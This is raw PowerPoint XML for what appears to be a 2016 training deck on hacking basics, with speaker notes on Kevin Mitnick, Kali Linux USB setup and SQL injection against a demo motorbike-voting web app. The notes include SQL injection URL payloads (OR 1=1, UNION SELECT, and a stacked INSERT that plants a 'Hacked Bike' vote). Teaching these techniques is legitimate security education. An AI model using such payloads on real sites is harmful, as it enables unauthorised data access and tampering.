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41"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="355" r:id="rId5"/>
    <p:sldId id="356" r:id="rId6"/>
    <p:sldId id="351" r:id="rId7"/>
    <p:sldId id="354" r:id="rId8"/>
    <p:sldId id="357" r:id="rId9"/>
    <p:sldId id="365" r:id="rId10"/>
    <p:sldId id="358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7" r:id="rId22"/>
    <p:sldId id="376" r:id="rId23"/>
    <p:sldId id="359" r:id="rId24"/>
    <p:sldId id="363" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="360" r:id="rId27"/>
    <p:sldId id="378" r:id="rId28"/>
    <p:sldId id="379" r:id="rId29"/>
    <p:sldId id="361" r:id="rId30"/>
    <p:sldId id="386" r:id="rId31"/>
    <p:sldId id="388" r:id="rId32"/>
    <p:sldId id="381" r:id="rId33"/>
    <p:sldId id="390" r:id="rId34"/>
    <p:sldId id="383" r:id="rId35"/>
    <p:sldId id="385" r:id="rId36"/>
    <p:sldId id="384" r:id="rId37"/>
    <p:sldId id="362" r:id="rId38"/>
    <p:sldId id="389" r:id="rId39"/>
    <p:sldId id="380" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6797675" cy="9926638"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-Z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2" clrIdx="0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00" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="936" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="323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C95BB-031D-49C9-BC24-893510484591}" type="datetimeFigureOut">
              <a:rPr lang="en-ZA" smtClean="0"/>
              <a:t>2016/11/18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2B1DC-0D11-46C9-BA2F-A758E396160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9610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3E1D2-D823-4853-8923-C3F4FE53C48F}" type="datetimeFigureOut">
              <a:rPr lang="en-ZA" smtClean="0"/>
              <a:t>2016/11/18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54A9E-370D-40B4-9708-88036972908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488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Kevin David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-Z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Mitnick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American computer security consultant, author and hacker, best known for his high-profile 1995 arrest and later five years in prison for various computer and communications-related crimes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-Z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Movie: Track Down, Also know as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-Z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Hackers 2 – Operation Takedown, Released in 2000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554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The Kali Linux version selected is a Rolling Edition.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>This means that you get 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of all worlds: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stability of Debian, together with the latest versions of the many outstanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-Z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penetration testing tools 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 and shared by the information security community.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01966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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fdisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will list all the drives on your machine. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the screenshot is the Flash drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> creates a directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> makes the volume accessible for reading / writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> writes to console and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> character pipes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" baseline="0" dirty="0"/>
              <a:t> the output to a new file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>umount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" baseline="0" dirty="0"/>
              <a:t> unmounts the volume.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01175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Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> parameters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikesByCC</a:t>
            </a:r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=1000' OR 1=1 --‘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27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913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Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> parameters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikesByCC</a:t>
            </a:r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=1000' OR 1=1 --‘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28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6310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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikesByCC</a:t>
            </a:r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=1000' union select * from votes -- ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>searchordered</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-Z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' UNION SELECT * FROM Makes -- ‘   Replace * with bar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29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810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  <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikesByCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>SearchOrdered?cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=1000'; INSERT INTO votes (Comments, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikeId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>) VALUES ('Hacked Bike', '0', '1'); -- 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30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8135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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Leaderboard?orderBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>votes&amp;asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=false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31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250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EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-0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9680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Z:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-0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5" y="1334170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7236296" y="24076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2585812"/>
            <a:ext cx="4561012" cy="1444100"/>
          </a:xfr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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft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247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5" y="1334170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7236296" y="24076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2585812"/>
            <a:ext cx="4561012" cy="1444100"/>
          </a:xfr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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft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4468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Z:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-0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8881" y="2211710"/>
            <a:ext cx="4200972" cy="1021556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l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882" y="3413904"/>
            <a:ext cx="4087203" cy="65519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9640" y="32903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370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8881" y="2298538"/>
            <a:ext cx="4200972" cy="1021556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="36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882" y="3500732"/>
            <a:ext cx="4087203" cy="65519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9640" y="337719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4067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951570"/>
            <a:ext cx="8105839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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr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6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116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0431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1329612"/>
            <a:ext cx="8105839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8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4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Z:\EOH Brand 2014\Presentations\Templates\Graphics\Backgrounds\Background-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93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951570"/>
            <a:ext cx="7601784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0618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Z:\EOH Brand 2014\Presentations\Templates\Graphics\Backgrounds\Background-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93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272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1329612"/>
            <a:ext cx="4073392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87901" y="1329928"/>
            <a:ext cx="3960813" cy="35099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15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8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EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-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57523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951570"/>
            <a:ext cx="4073392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87901" y="951570"/>
            <a:ext cx="3960813" cy="38883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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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5580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13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399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0"/>
            <a:ext cx="7554343" cy="789552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ZA" sz="2400" b="1" kern="1200" cap="none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342280" y="789552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1059582"/>
            <a:ext cx="8105839" cy="378042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pic>
        <p:nvPicPr>
          <p:cNvPr id="7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763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0"/>
            <a:ext cx="7554343" cy="789552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ZA" sz="2400" b="1" kern="1200" cap="none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42280" y="789552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>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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251522" y="855008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042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Z:\EOH Brand 2014\Presentations\Templates\Graphics\Backgrounds\Background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7560838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63492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Z:\EOH Brand 2014\Presentations\Templates\Graphics\Backgrounds\Background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7560838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1329612"/>
            <a:ext cx="7457768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03127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568" y="411510"/>
            <a:ext cx="7704855" cy="2268252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>
            <a:norm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157999" y="2841055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4140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4468" y="735546"/>
            <a:ext cx="7955062" cy="1944216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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600" b="1" i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157999" y="2841055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7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084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9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EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-1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654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EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-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5546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Z:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-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389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Z:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-1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8019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:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-0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067694"/>
            <a:ext cx="5497116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2147" y="3269889"/>
            <a:ext cx="3922713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4208" y="3091746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168829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Z:\EOH Brand 2014\Presentations\TEMPLATES\Graphics\Backgrounds\16-9 Backgrounds\Backgrounds_16-9_-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4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6" y="1005576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9952" y="2272046"/>
            <a:ext cx="4416997" cy="1811872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6297" y="2093903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2407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6" y="1005576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9952" y="2272046"/>
            <a:ext cx="4416997" cy="1811872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6297" y="2093903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91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4114800" cy="259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407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54" r:id="rId7"/>
    <p:sldLayoutId id="2147483755" r:id="rId8"/>
    <p:sldLayoutId id="2147483784" r:id="rId9"/>
    <p:sldLayoutId id="2147483756" r:id="rId10"/>
    <p:sldLayoutId id="2147483786" r:id="rId11"/>
    <p:sldLayoutId id="2147483757" r:id="rId12"/>
    <p:sldLayoutId id="2147483785" r:id="rId13"/>
    <p:sldLayoutId id="2147483759" r:id="rId14"/>
    <p:sldLayoutId id="2147483763" r:id="rId15"/>
    <p:sldLayoutId id="2147483758" r:id="rId16"/>
    <p:sldLayoutId id="2147483764" r:id="rId17"/>
    <p:sldLayoutId id="2147483782" r:id="rId18"/>
    <p:sldLayoutId id="2147483767" r:id="rId19"/>
    <p:sldLayoutId id="2147483768" r:id="rId20"/>
    <p:sldLayoutId id="2147483760" r:id="rId21"/>
    <p:sldLayoutId id="2147483776" r:id="rId22"/>
    <p:sldLayoutId id="2147483761" r:id="rId23"/>
    <p:sldLayoutId id="2147483762" r:id="rId24"/>
    <p:sldLayoutId id="2147483783" r:id="rId25"/>
    <p:sldLayoutId id="2147483766" r:id="rId26"/>
    <p:sldLayoutId id="2147483775" r:id="rId27"/>
    <p:sldLayoutId id="2147483774" r:id="rId28"/>
  </p:sldLayoutIdLst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net/core#Ubuntu" TargetMode="Externa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njection.net/table-nam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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://troels.arvin.dk/db/rdbm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blackhat.com/ad-12/Kalra/bh-ad-12-Oyedata-Kalra-WP.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/cc716760.aspx" TargetMode="Externa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kali.org/downloading/kali-linux-live-usb-persistence" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/downloads/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2263" y="-509632"/>
            <a:ext cx="9372329" cy="622322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854039" y="4565783"/>
            <a:ext cx="997824" cy="520338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941782" y="4656587"/>
            <a:ext cx="805269" cy="330907"/>
            <a:chOff x="1910" y="1367"/>
            <a:chExt cx="3862" cy="1587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910" y="1367"/>
              <a:ext cx="3862" cy="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4615" y="1645"/>
              <a:ext cx="1159" cy="1288"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 490"/>
                <a:gd name="T1" fmla="*/ 0 h 543"/>
                <a:gd name="T2" fmla="*/ 158 w 490"/>
                <a:gd name="T3" fmla="*/ 0 h 543"/>
                <a:gd name="T4" fmla="*/ 158 w 490"/>
                <a:gd name="T5" fmla="*/ 188 h 543"/>
                <a:gd name="T6" fmla="*/ 332 w 490"/>
                <a:gd name="T7" fmla="*/ 188 h 543"/>
                <a:gd name="T8" fmla="*/ 332 w 490"/>
                <a:gd name="T9" fmla="*/ 0 h 543"/>
                <a:gd name="T10" fmla="*/ 490 w 490"/>
                <a:gd name="T11" fmla="*/ 0 h 543"/>
                <a:gd name="T12" fmla="*/ 490 w 490"/>
                <a:gd name="T13" fmla="*/ 543 h 543"/>
                <a:gd name="T14" fmla="*/ 333 w 490"/>
                <a:gd name="T15" fmla="*/ 543 h 543"/>
                <a:gd name="T16" fmla="*/ 333 w 490"/>
                <a:gd name="T17" fmla="*/ 325 h 543"/>
                <a:gd name="T18" fmla="*/ 160 w 490"/>
                <a:gd name="T19" fmla="*/ 325 h 543"/>
                <a:gd name="T20" fmla="*/ 160 w 490"/>
                <a:gd name="T21" fmla="*/ 543 h 543"/>
                <a:gd name="T22" fmla="*/ 0 w 490"/>
                <a:gd name="T23" fmla="*/ 543 h 543"/>
                <a:gd name="T24" fmla="*/ 0 w 490"/>
                <a:gd name="T2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0" h="543">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="158" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="62"/>
                    <a:pt x="158" y="124"/>
                    <a:pt x="158" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="188"/>
                    <a:pt x="273" y="188"/>
                    <a:pt x="332" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="126"/>
                    <a:pt x="332" y="63"/>
                    <a:pt x="332" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="0"/>
                    <a:pt x="437" y="0"/>
                    <a:pt x="490" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="490" y="181"/>
                    <a:pt x="490" y="361"/>
                    <a:pt x="490" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="543"/>
                    <a:pt x="387" y="543"/>
                    <a:pt x="333" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="471"/>
                    <a:pt x="333" y="399"/>
                    <a:pt x="333" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="325"/>
                    <a:pt x="218" y="325"/>
                    <a:pt x="160" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="397"/>
                    <a:pt x="160" y="469"/>
                    <a:pt x="160" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="543"/>
                    <a:pt x="53" y="543"/>
                    <a:pt x="0" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="362"/>
                    <a:pt x="0" y="181"/>
                    <a:pt x="0" y="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3152" y="1602"/>
              <a:ext cx="1236" cy="1357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 522 w 522"/>
                <a:gd name="T1" fmla="*/ 288 h 572"/>
                <a:gd name="T2" fmla="*/ 486 w 522"/>
                <a:gd name="T3" fmla="*/ 455 h 572"/>
                <a:gd name="T4" fmla="*/ 305 w 522"/>
                <a:gd name="T5" fmla="*/ 569 h 572"/>
                <a:gd name="T6" fmla="*/ 195 w 522"/>
                <a:gd name="T7" fmla="*/ 565 h 572"/>
                <a:gd name="T8" fmla="*/ 10 w 522"/>
                <a:gd name="T9" fmla="*/ 348 h 572"/>
                <a:gd name="T10" fmla="*/ 56 w 522"/>
                <a:gd name="T11" fmla="*/ 106 h 572"/>
                <a:gd name="T12" fmla="*/ 171 w 522"/>
                <a:gd name="T13" fmla="*/ 21 h 572"/>
                <a:gd name="T14" fmla="*/ 375 w 522"/>
                <a:gd name="T15" fmla="*/ 27 h 572"/>
                <a:gd name="T16" fmla="*/ 510 w 522"/>
                <a:gd name="T17" fmla="*/ 193 h 572"/>
                <a:gd name="T18" fmla="*/ 522 w 522"/>
                <a:gd name="T19" fmla="*/ 288 h 572"/>
                <a:gd name="T20" fmla="*/ 160 w 522"/>
                <a:gd name="T21" fmla="*/ 290 h 572"/>
                <a:gd name="T22" fmla="*/ 177 w 522"/>
                <a:gd name="T23" fmla="*/ 389 h 572"/>
                <a:gd name="T24" fmla="*/ 266 w 522"/>
                <a:gd name="T25" fmla="*/ 449 h 572"/>
                <a:gd name="T26" fmla="*/ 353 w 522"/>
                <a:gd name="T27" fmla="*/ 387 h 572"/>
                <a:gd name="T28" fmla="*/ 356 w 522"/>
                <a:gd name="T29" fmla="*/ 201 h 572"/>
                <a:gd name="T30" fmla="*/ 263 w 522"/>
                <a:gd name="T31" fmla="*/ 135 h 572"/>
                <a:gd name="T32" fmla="*/ 172 w 522"/>
                <a:gd name="T33" fmla="*/ 203 h 572"/>
                <a:gd name="T34" fmla="*/ 160 w 522"/>
                <a:gd name="T35" fmla="*/ 29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2" h="572">
                  <a:moveTo>
                    <a:pt x="522" y="288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="346"/>
                    <a:pt x="515" y="403"/>
                    <a:pt x="486" y="455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="526"/>
                    <a:pt x="385" y="563"/>
                    <a:pt x="305" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="572"/>
                    <a:pt x="232" y="571"/>
                    <a:pt x="195" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="547"/>
                    <a:pt x="23" y="461"/>
                    <a:pt x="10" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="263"/>
                    <a:pt x="6" y="180"/>
                    <a:pt x="56" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="64"/>
                    <a:pt x="123" y="36"/>
                    <a:pt x="171" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1"/>
                    <a:pt x="309" y="0"/>
                    <a:pt x="375" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="448" y="57"/>
                    <a:pt x="494" y="113"/>
                    <a:pt x="510" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="516" y="224"/>
                    <a:pt x="522" y="256"/>
                    <a:pt x="522" y="288"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="290"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="324"/>
                    <a:pt x="163" y="358"/>
                    <a:pt x="177" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="428"/>
                    <a:pt x="227" y="446"/>
                    <a:pt x="266" y="449"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="452"/>
                    <a:pt x="341" y="422"/>
                    <a:pt x="353" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="325"/>
                    <a:pt x="376" y="263"/>
                    <a:pt x="356" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="159"/>
                    <a:pt x="306" y="135"/>
                    <a:pt x="263" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="135"/>
                    <a:pt x="187" y="160"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="231"/>
                    <a:pt x="161" y="260"/>
                    <a:pt x="160" y="29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908" y="1642"/>
              <a:ext cx="1015" cy="1288"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 429"/>
                <a:gd name="T1" fmla="*/ 0 h 543"/>
                <a:gd name="T2" fmla="*/ 421 w 429"/>
                <a:gd name="T3" fmla="*/ 0 h 543"/>
                <a:gd name="T4" fmla="*/ 421 w 429"/>
                <a:gd name="T5" fmla="*/ 116 h 543"/>
                <a:gd name="T6" fmla="*/ 159 w 429"/>
                <a:gd name="T7" fmla="*/ 116 h 543"/>
                <a:gd name="T8" fmla="*/ 159 w 429"/>
                <a:gd name="T9" fmla="*/ 203 h 543"/>
                <a:gd name="T10" fmla="*/ 402 w 429"/>
                <a:gd name="T11" fmla="*/ 203 h 543"/>
                <a:gd name="T12" fmla="*/ 402 w 429"/>
                <a:gd name="T13" fmla="*/ 314 h 543"/>
                <a:gd name="T14" fmla="*/ 159 w 429"/>
                <a:gd name="T15" fmla="*/ 314 h 543"/>
                <a:gd name="T16" fmla="*/ 159 w 429"/>
                <a:gd name="T17" fmla="*/ 421 h 543"/>
                <a:gd name="T18" fmla="*/ 429 w 429"/>
                <a:gd name="T19" fmla="*/ 421 h 543"/>
                <a:gd name="T20" fmla="*/ 429 w 429"/>
                <a:gd name="T21" fmla="*/ 543 h 543"/>
                <a:gd name="T22" fmla="*/ 0 w 429"/>
                <a:gd name="T23" fmla="*/ 543 h 543"/>
                <a:gd name="T24" fmla="*/ 0 w 429"/>
                <a:gd name="T2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9" h="543">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="0"/>
                    <a:pt x="280" y="0"/>
                    <a:pt x="421" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="38"/>
                    <a:pt x="421" y="76"/>
                    <a:pt x="421" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="116"/>
                    <a:pt x="248" y="116"/>
                    <a:pt x="159" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="173"/>
                    <a:pt x="159" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="203"/>
                    <a:pt x="321" y="203"/>
                    <a:pt x="402" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="241"/>
                    <a:pt x="402" y="276"/>
                    <a:pt x="402" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="314"/>
                    <a:pt x="241" y="314"/>
                    <a:pt x="159" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="350"/>
                    <a:pt x="159" y="384"/>
                    <a:pt x="159" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="421"/>
                    <a:pt x="338" y="421"/>
                    <a:pt x="429" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="462"/>
                    <a:pt x="429" y="502"/>
                    <a:pt x="429" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="543"/>
                    <a:pt x="144" y="543"/>
                    <a:pt x="0" y="543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="363"/>
                    <a:pt x="0" y="182"/>
                    <a:pt x="0" y="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111" y="2629"/>
              <a:ext cx="412" cy="304"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 174"/>
                <a:gd name="T1" fmla="*/ 128 h 128"/>
                <a:gd name="T2" fmla="*/ 114 w 174"/>
                <a:gd name="T3" fmla="*/ 0 h 128"/>
                <a:gd name="T4" fmla="*/ 174 w 174"/>
                <a:gd name="T5" fmla="*/ 128 h 128"/>
                <a:gd name="T6" fmla="*/ 0 w 174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8">
                  <a:moveTo>
                    <a:pt x="0" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="96"/>
                    <a:pt x="90" y="57"/>
                    <a:pt x="114" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="44"/>
                    <a:pt x="154" y="85"/>
                    <a:pt x="174" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="128"/>
                    <a:pt x="60" y="128"/>
                    <a:pt x="0" y="128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3044" y="2634"/>
              <a:ext cx="411" cy="299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 174 w 174"/>
                <a:gd name="T1" fmla="*/ 126 h 126"/>
                <a:gd name="T2" fmla="*/ 0 w 174"/>
                <a:gd name="T3" fmla="*/ 126 h 126"/>
